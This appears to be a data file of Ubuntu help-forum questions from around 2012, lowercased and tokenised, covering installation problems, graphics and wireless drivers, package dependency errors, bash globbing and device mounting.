206471	can i do filename pattern matching in a bash script ?	can i do filename pattern matching in a bash script ? test is a directory with the following files ... bob @ bob-laptop : ~/test $ ls exclude exclude1 exclude2 include1 include2 from the command line , if i want to exclude some of the files , i can do ... bob @ bob-laptop : ~/test $ echo ! ( exclude* ) include1 include2 but , if i put that command in a script ( named exclude ) ... bob @ bob-laptop : ~/test $ cat exclude echo ! ( exclude* ) when i execute it , i get an error ... bob @ bob-laptop : ~/test $ ./exclude ./exclude : line 1 : syntax error near unexpected token ` ( ' ./exclude : line 1 : `echo ! ( exclude* ) ' i 've tried every ( i think ) variation of escaping some , all or none of the special characters and i still get an error . what am i missing here ? if i ca n't do this , would someone please be so kind as to explain why ?
206472	ubuntu one installation problem	while installing ubuntu one using the ubuntu one icon on desktop in 12.04 lts , i got the following error : libqtassistantclient4 libqtwebkit4 python-qt4 python -qt4-dbus python-sip tried using terminal and got this error : pravin @ pravin-virtual-machine : ~ $ sudo apt-get install ubuntuone-client-gnome [ sudo ] password for pravin : reading package lists ... done building dependency tree reading state information ... done ubuntuone-client-gnome is already the newest version . the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic-pae use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
206474	how to fix fullscreen focus error in unity ?	recently , i 've been experiencing an error with programs that have a fullscreen mode with low resolution ( 80xx600 and below ) in unity . the problem is n't valid in gnomeshell . whenever i launch an application , unity would enlarge the screen more than it should be and would only show me the upper left corner of the screen ( i only see a magnified quarter of the screen ) . at first i thought that it was an issue related to wine but i later found out that native applications ( such as world of goo ) are affected as well . apps that taken on the full screen but have a larger resolution do n't face such an issue . is it possible to get this fixed manually ? or do i have to wait for updates ?
206476	can not install tivion from ppa	the message i get is : check your internet connection . failed to fetch http : //ppa.launchpad.net/shakaran/ppa/ubuntu/dists/quantal/main/source/sources 404 not found failed to fetch http : //ppa.launchpad.net/shakaran/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found
206486	apple magic mouse too sensitive on ubuntu 12.10	i 've just installed ubuntu 12.10 and i 'm trying to use the magic mouse but it does n't work properly , the problem is that the tracking is too much sensitive and the scroll is too much insensitive . i tried to edit settings with the xinput set-ptr-feedback command but nothing changed . is there anyone with the same problem who can help me ? update : problem solved for the tracking , but scrolling is still too slow , this is my xinput setting for the mouse : luca @ luca-imac : ~ $ xinput list-props 14 device 'magic mouse ' : device enabled ( 146 ) : 1 coordinate transformation matrix ( 148 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 273 ) : 0 device accel constant deceleration ( 274 ) : 3.000000 device accel adaptive deceleration ( 275 ) : 1.000000 device accel velocity scaling ( 276 ) : 10.000000 device product id ( 265 ) : 1452 , 781 device node ( 266 ) : `` /dev/input/event10 '' evdev axis inversion ( 277 ) : 0 , 0 evdev axes swap ( 279 ) : 0 axis labels ( 280 ) : `` rel x '' ( 156 ) , `` rel y '' ( 157 ) , `` rel horiz wheel '' ( 271 ) , `` rel vert wheel '' ( 272 ) button labels ( 281 ) : `` button left '' ( 149 ) , `` button middle '' ( 150 ) , `` button right '' ( 151 ) , `` button wheel up '' ( 152 ) , `` button wheel down '' ( 153 ) , `` button horiz wheel left '' ( 154 ) , `` button horiz wheel right '' ( 155 ) evdev middle button emulation ( 282 ) : 0 evdev middle button timeout ( 283 ) : 50 evdev third button emulation ( 284 ) : 0 evdev third button emulation timeout ( 285 ) : 1000 evdev third button emulation button ( 286 ) : 3 evdev third button emulation threshold ( 287 ) : 20 evdev wheel emulation ( 288 ) : 0 evdev wheel emulation axes ( 289 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 290 ) : 10 evdev wheel emulation timeout ( 291 ) : 0 evdev wheel emulation button ( 292 ) : 4 evdev drag lock buttons ( 293 ) : 0 any idea ?
206489	how to install chrome autosave extension ?	i would like to install chrome autosave plugin on ubuntu . when i try to install it with these steps https : //github.com/nv/chrome-devtools-autosave-server , i got some errors ... there was not installed node and npm out of box on ubuntu 12.10 . so i installed npm and node with these commands . sudo apt-get install npm sudo apt-get install node and i tried to install autosave here is the output : sudo npm install -g autosave npm http get https : //registry.npmjs.org/autosave npm http 304 https : //registry.npmjs.org/autosave npm http get https : //registry.npmjs.org/commander npm http 304 https : //registry.npmjs.org/commander /usr/local/bin/autosave - > /usr/local/lib/node_modules/autosave/bin/autosave > autosave @ 1.0.2 install /usr/local/lib/node_modules/autosave > node ./scripts/install.js npm err ! error installing autosave @ 1.0.2 npm warn this failure might be due to the use of legacy binary `` node '' npm warn for further explanations , please read npm warn /usr/share/doc/nodejs/readme.debian npm warn npm err ! autosave @ 1.0.2 install : `node ./scripts/install.js` npm err ! `sh `` -c '' `` node ./scripts/install.js '' ` failed with 1 npm err ! npm err ! failed at the autosave @ 1.0.2 install script . npm err ! this is most likely a problem with the autosave package , npm err ! not with npm itself . npm err ! tell the author that this fails on your system : npm err ! node ./scripts/install.js npm err ! you can get their info via : npm err ! npm owner ls autosave npm err ! there is likely additional logging output above . npm err ! npm err ! system linux 3.5.0-17-generic npm err ! command `` /usr/bin/nodejs '' `` /usr/bin/npm '' `` install '' `` -g '' `` autosave '' npm err ! cwd /home/naczu npm err ! node -v v0.6.19 npm err ! npm -v 1.1.4 npm err ! code elifecycle npm err ! message autosave @ 1.0.2 install : `node ./scripts/install.js` npm err ! message `sh `` -c '' `` node ./scripts/install.js '' ` failed with 1 npm err ! errno { } npm err ! npm err ! additional logging details can be found in : npm err ! /home/naczu/npm-debug.log npm not ok and here is readme.debian nodejs for debian ================= packaged modules -- -- -- -- -- -- -- -- the global search path for modules is /usr/lib/nodejs future packages of node modules will use that directory , so it should be used wisely . user modules -- -- -- -- -- -- node looks for modules in ./node_modules directory first ; please read node # modules documentation carefully for more information . node does not look for modules in /usr/local/lib/node_modules , where npm put them . please read npm-link ( 1 ) of npm package , to understand how to properly use npm-installed modules in a project . note that require.paths is not supported in future node versions . see also node ( 1 ) for more information about node_path . nodejs command -- -- -- -- -- -- -- the upstream name for the node.js interpreter command is `` node '' . in debian the interpreter command has been changed to `` nodejs '' . this was done to prevent a namespace collision : other commands use the same name in their upstreams , such as ax25-node from the `` node '' package . scripts calling node.js as a shell command must be changed to instead use the `` nodejs '' command .
206493	grub customizer taking over 5 minutes to start	since updating 12.04 to 12.10 , the grub customizer now takes over 5 minutes to appear on screen after clicking on icon . i have tried reinstalling it . any other suggestions as 5 minutes+ seems far too long to wait .
206495	dropbox configuration	i 've dropbox v1.4.17 installed and i want to change the path from ( ... ) /dropbox to ( ... ) /dropbox . i think until v1.2 this was done by changing dropbox_path field in the sqlite file ~/.dropbox/config.db . now , this field is hidden inside the encrypted ~/.dropbox/config.dbx ( security reasons ( in this youtube video ) , i guess ) . anyone has a solution to this ? i 'm thinking about placing my dropbox folder in ~/.local/share/dropbox and then linking that to the path i want to set .
206496	ubuntu always over writes my other os boot record	ubuntu is not my primary os . how do i prevent ubuntu from pirating the boot ? i do not want to boot solaris or windows from a menu .
206506	best ubuntu 12.10 janitor program	what is the best janitor program for ubuntu 12.10 , i been using ubuntu tweaks but as far as i know they stopped development on this program any good alternative thank you in advanced
206509	minecraft issues on ubuntu	i recently bought minecraft and installed it on ubuntu ( i have played it on a windows with no problems ) . i have jdk java 6 runtime . when i try to open minecraft with java it gives me an error message that says it is not marked as executable . it is .jar . do i need to convert it to .exe ? if so , how ? i am relatively new to ubuntu and would appreciate any help !
206512	how to delete files	i like the openoffice software , but can i delete files from an external drive , say a flash drive , and if so how ? with windows , it is fairly simple .
206519	hardrive wo n't mount on 12.10	i just upgraded to 12.10 and one of my media hard drives wo n't mount . the drive shows up on /dev/sda but does n't mount . dmesg|tail [ 289.496933 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 292.502310 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 299.540914 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 307.700473 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 307.804819 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 698.017043 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 703.933411 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 704.055936 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 706.293292 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 1134.268187 ] fat-fs ( sda1 ) : unrecognized mount option `` x-gvfs-show '' or missing value
206526	ipv6 just wont go away 12.10 server	after very long time using ubuntu old lts version i have re-installed to new lts 12.10 , but i ca n't get rid of ipv6 ! i have did : in /etc/modprobe.d/blacklist.conf : blacklist ipv6 blacklist ip6table_filter blacklist ip6_tables in /etc/sysctl.conf net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 but ufw happily use v6 protocol , and in dmesg : ip6_tables : ( c ) 2000-2006 netfilter core team . . ipv6 : addrconf ( netdev_change ) : em1 : link becomes ready what is going to take to get rid of ipv6 ? i swear terminator did n't put so much fight .
206529	atheros ar9285 wireless extremely slow	i recently upgraded to ubuntu 12.10 , and things were going great.. but suddenly , the wifi connection went extremely slow . i have a 20 m connection and normally download files al 1 mb/s or so.. but today i dont get any faster than 120 kb/s . also , if i use wired connection , the speed goes normal . following some advice on the net i changed network-manager with wicd , but the issue has n't gone away any clues ? pd . my wireless card is atheros ar9285
206531	unable to open recovery , at boot , using `` shift '' key ( 12.04 lts )	noob dad here ... i have tried rebooting multiple times to try to get to `` recovery '' ( grub 2 ) by holding down `` shift '' during boot . i am waiting until bios screen completes . need to reset admin password ... son , also a noob , set-up initial pw and forgot it . single ubuntu boot ; not dual . no windows ; one linux partition . no joy ! your assistance is greatly appreciated .
206534	add-apt-repository not working in ubuntu 12.10	when i try to add a ppa using the command : sudo add-apt-repository [ insert ppa ] the output i get is : error in sitecustomize ; set pythonverbose for traceback : eoferror : eof read where not expected traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 3 , in < module > from __future__ import print_function eoferror : eof read where not expected this is the desktop version . it 's a clean install and i did n't get any log errors on install . i have n't added or removed any python versions . can someone set me straight on how to fix this ?
206536	display driver problem	i just recently installed ubuntu 12.10 on my laptop and am keeping windows 7 as a back up for when i get stuck like now ... .. after i installed ubuntu i got on line and was reading about some of the things to do after installing for the first time . one of them was looking for additional drivers witch i did and found two display drivers . both drivers were from ubuntu . however after install and a reboot i ca n't see any of my menu bars ... ..no app bar on the side ... ..no bar at the top of the display ... nothing . i did have a file on the desktop that i was able to open . and i just learned that ctrl+alt+t gets me a form of command prompt . this worked but i do n't know how to use it . how do i get my menu bars back ? ? is there a way to uninstall the drivers ? i am really new to ubuntu and like it so far but am having problems getting over the learning curve .
206538	internet on ubuntu 10.04 not working after installing updates on update manager	recently , i was told that i was suppose to install the suggested updates on update manager , so i did . since i usually ignore the update manager , it took a long time to install everything . after i restarted my pc , i notice the internet connection was n't working . i tried to remove some of the packages i installed earlier but that did n't work . i also tried to upgrade my computer to ubuntu 12.04 but they said i could n't because i do n't have internet access . it 's been a day and still no connection to the internet on my pc . please help me , if you have any solutions . thank you .
206539	is unity 3d the issue and not the driver ? clean ubuntu 12.04 lts on system with nvidia geforce fx 5700le	my system has a nvidia geforce fx 5700le . i just performed a clean install of ubuntu 12.04 lts ( ubuntu-12.04.1-desktop-i386.iso ) . the first boot after installation , the icons on the unity launcher are invisible . in a terminal , i run /usr/lib/nux/unity_support_test -p it confirms that i am running unity 3d with the open source video driver . mmorris @ ion : ~ $ /usr/lib/nux/unity_support_test -p nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 55 nvfx_screen_get_param:95 - warning : unknown pipe_cap 56 nvfx_screen_get_param:95 - warning : unknown pipe_cap 59 nvfx_screen_get_param:95 - warning : unknown pipe_cap 58 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 opengl vendor string : nouveau opengl renderer string : gallium 0.4 on nv36 opengl version string : 1.5 mesa 8.0.4 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes clearly there is an issue ... besides the invisible unity launcher icons there are those warning . i install the restricted nvidia driver ( version 173-updates ) and reboot . the icons on the unity launcher are now visible . in a terminal , i run /usr/lib/nux/unity_support_test -p it confirms that i am running unity 2d with the nvidia 173.14.35 video driver . that is great , but unity 2d ? so i find this , why is my card unity blacklisted with all the requirements fulfilled ? which leads me to this , force unity / compiz to run , natty narwhal so in a terminal i run : sudo cp /etc/environment /etc/environment.orig sudo bash -c `` echo unity_force_start=1 > > /etc/environment '' after a reboot , the icons on the unity launcher are invisible again . this leads be to believe the issue is not with the video drivers , rather with unity , specifically unity 3d . can anyone further this ? you can go back to unity 2d and visible unity launcher icons with : sudo mv /etc/environment.orig /etc/environment btw i beginning to feel that lts for 12.04 means , long time before stable . @ fabricator4 not able to comment yet in here so will answer here . please re-read my question . the issue with unity 3d on my system started with the nouveau open source drives and exists with nvidia too . hence my hypothesis that it is something in unity 3d , rather than the drivers . i have been actively using ubuntu since 8.04 or so . actively as in tossed out windows and run ubuntu on 2 desktops and 3 laptops . for as much as i have seen on the internet about ubuntu 12.04 and video drivers ( open source , nvidia , ati ) / unity issues / x issues , i can not believe that 12.04 lts is nearly as stable as 10.04 lts was . what is a desktop install of and operating system worth if the ui is glitchy at best . unity could use some more time in the oven .
206548	see a list of recently accessed files , sorted by date	in ubuntu , is it possible to view a list of all recently accessed files ( by date ? ) the unity search menu only shows a short list of recent files for a given search term : i 'd like to see a longer list of recent files . i think i once encountered a program that may have done something like this - i think it was an add-on for gnome do , but i ca n't remember its name .
206549	can not log into cinnamon after deleting ~/.config	after i removed `` ./.config '' from home folder , i can not log in to the cinnamon session : failed to load session `` cinnamon '' what do i do ? xsession-error : xsession : x session started for tux at fri oct 26 06:35:58 irst 2012 localuser : tux being added to access control list setting im through im-switch for locale=en_us . start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit/xinput.d/default . failed to connect to the virtualbox kernel service failed to connect to the virtualbox kernel service failed to connect to the virtualbox kernel service failed to connect to the virtualbox kernel service i am runing cinnamon on a local machine , no on virtualbox . but virtualbox is installed for some usage . ! ?
206558	how to remove the âamd testing use onlyâ watermark ?	i 've installed the latest catalyst driver ( beta ) following the step in this guide for ubuntu quantal quetzal . my system is 64 bit and my graphic card is an ati radeonhd 6670 , this g.c . is officially supported ( catalyst & open source ) , you can confirm that from this amd linux community thread . i do n't have any problem , except the amd testing use only watermark . i see the following frame in any stage into the os ( logged , unlloged , etc . ) except in the terminals . i found different versions of how to remove this image , but this change according to the system , so i want an answer from this popular ( trusted ) site . how to solve this issue in ubuntu 12.10 32b ? this procedure is different in a 64b system ?
206559	how do you configure mupen64plus controls ?	i installed mupen64plus from the repositories using synaptic . i like the emulator ( for the most part , a couple of graphics glitches on tloz ocarina of time ) , especially its performance on my old machine , but i can not figure out how to configure the controls for myself . i tried looking at google code 's guide here but i ca n't find the file i need to edit and the link with the key ids is n't working , so even if i could find the file i would n't be able to change anything . so what i need is a resource with the key ids and where to find the file i need to edit . i am running ubuntu 12.10 32-bit . 2gb ram , intel core 2 duo @ 2.00ghz here 's an additional part of the question . m64py is a popular option . however , it requires that you input the paths to the various files it needs . where are the default locations ? include for both the 32 bit system and a 64 bit system . ( the files needed are library file , plugin directory and data directory . )
206563	synaptics touchpad can not move while pressing a key ? v 8.1	my synaptics touchpad refuses to move anytime i am pressing a key on the keyboard . i 've looked everywhere on the internet telling me to go to device pointer properties , then settings , then pointing , then sensitivity then mess with palm check , but palm check is n't there and it is n't anywhere else . please respond to this as this is pretty frustrating . my touchpad is synaptics clickpad v8.1 would installing an older driver give me a palm check option ? if so , where do i install an older one
206564	when trying to install wine on 12.10 , 'sudo ' command will not let me type in a password	as the title explains , i have been attempting to install wine on my laptop which is running 12.10 . when i access the command terminal and entered sudo add-apt-repository ppa : ubuntu-wine/ppa i was of course met by a password block , when i attempted to enter my password , it flat out would n't let me type anything , the only key that got a response from the terminal was `` enter '' which was met by `` incorrect password '' . to bypass this issue i backed out and used the gksudo command , this new dialogue box seemed to give me access to sudo commands . i then entered sudo apt-get update and sudo apt-get install wine1.5 . up until the installation everything went fine , but after entering the final command ( still using gksudo ) the terminal read `` the following packages have unmet dependencies '' and proceeded to list a bunch of `` recommends '' so my guess is that wine has n't been updated to run on 12.10 ... is this true , and is there any other way to open .exe 's ? also what was with that funky password mishap ? i 'm totally new to ubuntu so i 've just been using support pages and tutorials , sorry if i 'm a bit naive in these matters ...
206572	create a bootable image on a mac osx to install ubuntu on a windows machine	title says it all - as you can imagine , searching for the answer i have here is utterly impossible to find anything online ... i tried this : https : //help.ubuntu.com/12.10/installation-guide/amd64/boot-usb-files.html but that did n't work . can anyone help ? thanks !
206577	how to install ubuntu alongside with windows ?	i want to install ubuntu alongside with windows 7 . i have downloaded ubuntu 12.10 not using wubi and have n't still installed it . please help ! : (
206578	how to install ubuntu 12.04 from iso using wubi	how to install ubuntu 12.04 lts from the downloaded iso inside windows with using wubi installer.i am using windows xp and windows7 ( dual boot ) . i have tried putting wubi and iso in one folder but when i started installation with wubi it is downloading files from internet rather then taking from .iso . i want wubi that installs directly from iso rather than downloading .
206580	lenovo v570 ubuntu 12.04 wireless hard blocked even when ext . switch is on	just to let everyone know , i 've solved this . some how it got turned off in backtrack 5 and i was able to use the keyboard commands in bt5 to turn the wireless on . when i run iwconfig it say 's lo and eth0 have no wireless extensions , but wlan0 it says ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts the : off fragment the : off power management : off and i believe that 's my problem , i just do n't know how to turn it back on any help ? when i ran lspci | grep network it gave me this 02:00.0 network controller : intell corporation centrino wireless -n + wimax 6150 ( rev 67 ) how i know that my wireless is hard blocked because when i run sudo rfkill list all i get 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes when i run lshw -c network i get . *-network disabled description : wireless interface product : centrino wireless-n + wimax 6150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : mon1 version : 67 serial : 40:25 : c2 : d2:96:2c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list logical wireless ethernet physical configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-32-generic-pae firmware=41.28.5.1 build 33926 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:43 memory : d0500000-d0501fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : f0 : de : f1 : d7 : a0:4d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.0.65 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff another thing i 've noticed is that i ca n't take my computer out of airplane mode . when i click on dash > network it tells me that airplane mode is on and i when i flip it over to off , it says it 's off , but i ca n't turn wireless on , and when i close and reopen the network window it is back on . @ belacqua yeah when i do that , it turns this 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes into this 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes the exterior wireless switch turns it to this 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : yes 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes
206581	how to connect internet in ubuntu using the bluetooth connection ?	how to connect internet in ubuntu using the bluetooth connection ? please provide some screen shots on those
206590	my wd 1tb external hdd is not mounting	i am getting this error when i click on devices list : dbus error org.gtk.private.remotevolumemonitor.failed : an operation is already pending and when i remove the device , it says : error mounting : mount exited with exit code 13 : the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . failed to sync device /dev/sdb1 : input/output error failed to close volume /dev/sdb1 : input/output error i have tried to show the disk in terminal using sudo fdisk -l but it is not in the list . i can go via /media/xyz but after giving ls command , the terminal just hangs and shows nothing . please help me to recover my data .
206593	how to install rgdal on ubuntu 12.10 ?	i 'm strugling to install rgdal library on ubuntu 12.10 . installation from within r results in error : error : gdal-config not found the gdal-config script distributed with gdal could not be found . if you have not installed the gdal libraries , you can download the source from http : //www.gdal.org/ if you have installed the gdal libraries , then make sure that gdal-config is in your path . try typing gdal-config at a shell prompt and see if it runs . if not , use : -- configure-args= ' -- with-gdal-config=/usr/local/bin/gdal-config ' with appropriate values for your installation . error : configuration failed for package ‘rgdal’ * removing ‘/home/rdk/r/x86_64-pc-linux-gnu-library/2.15/rgdal’ warning in install.packages : installation of package ‘rgdal’ had non-zero exit status r-sig-geo , this two se questions and other websites pointed me to the requirements of libgdal1-dev . but when i tried sudo apt-get install libgdal1-dev i end up with another error message some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgdal1-dev : depends : libgdal-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . again - when i try to install libgdal-dev another dependencies error shows up the following packages have unmet dependencies : libgdal-dev : depends : libgeos-dev but it is not going to be installed depends : libspatialite-dev but it is not going to be installed again trying libgeos-dev gives message : depends : libgeos-c1 ( = 3.3.3-1.1 ) but 3.3.3-2~precise2 is to be installed e : unable to correct problems , you have held broken packages . and libspatialite-dev : depends : libspatialite3 ( = 3.1.0~rc2-1ubuntu1 ) but 3.1.0~rc2-2~precise1 is to be installed is there any way to tame those dependencies and have rgdal running in ubuntu ? my sessioninfo ( ) r version 2.15.1 ( 2012-06-22 ) platform : x86_64-pc-linux-gnu ( 64-bit )
206596	how to reset ubuntu fonts ?	i 've just followed some advice on askubuntu and installed gnome-shell over lubuntu . everything went smooth , apart from the fonts that look different and ugly ( as in some java programs ) . i 've tried with xubuntu and it 's the same . is there a way to fix this ?
206597	12.10 64-bit does not want to work with the gtx 670	i have been trying to install quantal amd64 on the following pc : asus p8z77-i deluxe lga ( z77-based ) ivy bridge i5-3570k ( overclocked but why would that matter ? ) evga gtx 670 dual samsung 830 series ssds unfortunately , the quetzal seems hellbent on disappointing me . here 's how : live cd does n't even start properly . display is filled with colorful noise , though i can see the mouse moving . installation , however , works just fine . no display issues and no errors during installation . when booted , sometimes i get colorful noise on screen and a hang and sometimes i get the `` running in low graphics mode error '' with my mouse and keyboard maybe working and maybe not . when i click ok , the system hangs in the next dialog screen -- the one that offers the various options to deal with the issue . i tried getting into recovery and using the console to install the latest nvidia drivers as per this question . that did n't work : the system would hang randomly while i was in the middle of running the commands . switched to the integrated gpu and that actually worked . i got desktop , opened the terminal , and installed the driver . switched back to the discrete gpu and it still did n't work . the system would hang midway and at random points during the initialization process -- usually in the first 1-2 seconds . i ca n't boot into recovery ( hangs before it ) . ca n't even boot when i switched back to the igpu . somehow , the os managed to roll my mb 's clock by 7 hrs . insult to injury . now , i 'm stuck . i am 99 % sure it 's the bleepin ' graphics driver but sometimes with linux you never know for sure . people have obviously gotten their kepler-based gpus to run fine under ubuntu so what gives ? ! please let me know if you have managed to pull the above feat of strength . i have to know what incantations you used and what animal you sacrificed .
206600	white text on white background in selections after fresh install in vm	i freshly installed kubuntu 12.04 in my oracle vm virtualbox on windows 7 . everything works fine except , that if i select any text in many applications ( for example bluefish-editor ) the background is not the standard color , but instead it is white . so i can not read the text that i selected . how could this happen ? a workaround would be to change the color globally somehow like this : how do i change the `` selected items '' color ?
206604	svn and gnome keyring	how to fix the following issue : $ svn update password for 'default ' gnome keyring : svn : gnome keyring is locked and we are non-interactive i have googled around but ca n't seem to find a satisfactory answer .
206605	radeon hd + vgaswitcheroo	i have a hp envy4 1025tx machine . i 've tried vgaswitcheroo and amdcccle . i 'm happy with vgaswitcheroo powersaving efficiency and amdcccle 's performance . i want both of them on my system . is there a way to configure a kernel to boot into either one of these settings from the grub boot menu . i mostly dont need discreet graphic card . but when i need it , i use it at the extremes . please help me with the procedure .
206607	how do i enable multitouch support on synaptics ?	i 'm using vaio which uses synaptics touch pad . multi touch gestures worked with no trouble on my previous installed operating system , windows 7 . now it seems like i ca n't use multi touch gestures on ubuntu 12.10 at all . how exactly do i install the right drivers to make multi touch possible on my laptop . thank you in advanced . best regards
206611	automatically connect bluetooth mouse	i have a bluetooth mouse ( apple mighty mouse ) which i use with kubuntu ( kde ) . i always have to manually connect to the mouse , although it is listed as a trusted device . how can i automatically connect the mouse when i have it turned on ? or at least reconnect after suspend ?
206614	usb slots stop working suddenly from time to time	after re-installing lubuntu 12.04 system on my laptop an older problem re-emerged after a few days and installation of different programs : without apparent reason the external mouse and sometimes other usb connected devices ( including hdd ) stop working . the hdd shows it has tension as it has a light there , and the external mouse flashes for a second when plugged . i have posted a different version of this problem before . i keep it for now as example of the two answers there . none of them works here . logging out-in does nothing , restart does . the event seems entirely random , after reboot it will reappear after many days or weeks or , rarely , after a few hours . http : //pastebin.com/0qr8bhhx in var/log/syslog after new occurrence ( with only external wired mouse and keyboard ) what counts is at the end i guess : nov 24 14:06:55 cprq-hp-compaq-nx8220-py518ea-abb kernel : [ 29953.822962 ] usb 3-1 : usb disconnect , device number 3 nov 24 14:06:57 cprq-hp-compaq-nx8220-py518ea-abb kernel : [ 29955.069427 ] uhci_hcd 0000:00:1d.0 : host controller process error , something bad happened ! nov 24 14:06:57 cprq-hp-compaq-nx8220-py518ea-abb kernel : [ 29955.069439 ] uhci_hcd 0000:00:1d.0 : host controller halted , very bad ! nov 24 14:06:57 cprq-hp-compaq-nx8220-py518ea-abb kernel : [ 29955.069461 ] uhci_hcd 0000:00:1d.0 : hc died ; cleaning up nov 24 14:06:57 cprq-hp-compaq-nx8220-py518ea-abb kernel : [ 29955.069492 ] usb 2-2 : usb disconnect , device number 2 i have noticed that on most occasions only the external mouse and keyboard are affected , but not the external hdd . or if it is , replugging it solves the problem . i have a dual boot with winxp : in windows this never happens , so it is not a hardware issue i have used lubuntu quantal 12.10 and the same problem happened there as well . upgrading to that would not be a solution on certain occasion only restarting 2 or even 3 times solved it . using the same pc/hardware with linux mint 14 ( quantal ) xfce , the problem almost disappeared ( it happened once since then ) . i am not sure whether this 'solution ' comes from using xfce or mint ( i guess mint 14 nadia uses the same kernel as lubuntu quantal ) .
206616	webos hp touchpad - unable to ssh into tablet via ubuntu	i installed the openssh server and client application on ubuntu , then installed openssh via preware on the hp touchpad , along with xecutah , and xterm . i enter ssh root @ 192.168.2.6 and get this line : permission denied ( publickey , keyboard-interactive ) . however when i type in this via the hp touchpad i am able to ssh into the remote machine after entering the user 's password : ssh user @ 192.168.2.2 any help would be appreciated . thank you .
206617	how to completely remove ubuntu one from windows xp/vista	i have two different accounts for ubuntu one , the older one is now not needed and i have been using the newer account to save files from my other desktop ( ubuntu 12.10 ) . i now want to access the new account from my windows pc : ( i understand there are ways to do this for ubuntu but i 'm having trouble finding a solution for windows xp/vista . thanks .
206618	how to stop alacarte from crashing ?	alacarte is crashing with this terminal output : traceback ( most recent call last ) : file `` /usr/bin/alacarte '' , line 37 , in < module > main ( ) file `` /usr/bin/alacarte '' , line 33 , in main app = mainwindow ( datadir , version ) file `` /usr/share/alacarte/alacarte/mainwindow.py '' , line 43 , in __init__ self.editor = menueditor ( ) file `` /usr/share/alacarte/alacarte/menueditor.py '' , line 31 , in __init__ self.load ( ) file `` /usr/share/alacarte/alacarte/menueditor.py '' , line 45 , in load raise valueerror ( `` can not load menu tree % r '' % ( self.name , ) ) valueerror : can not load menu tree 'applications.menu'
206623	what irc servers are available for ubuntu	i want to setup an irc server in my local network . i would like to know the irc server options available for ubuntu . i heard that irc-hybrid is good . do you have any other suggestions . the thing is that i want to use an irc server which is generally used by most of the ubuntu community ( who uses irc server ) . i would also like to know the exact steps to configure it .
206624	how do i script to open a set of programs each on specific workspace ?	i looked around for a while and could not figure out the answer to my following problem : i have a setup of six desktops on ubuntu 12.04 with unity . on start up , every morning , i go through a routine of opening the same five or six programs . i open each on a specific workspace . i would like to have this automated . is there a way to script or configure this ? additional question : to further complicate the matter , i am running two screens in twin view mode . i actually need to start each program on a specific screen , preferably in full screen .
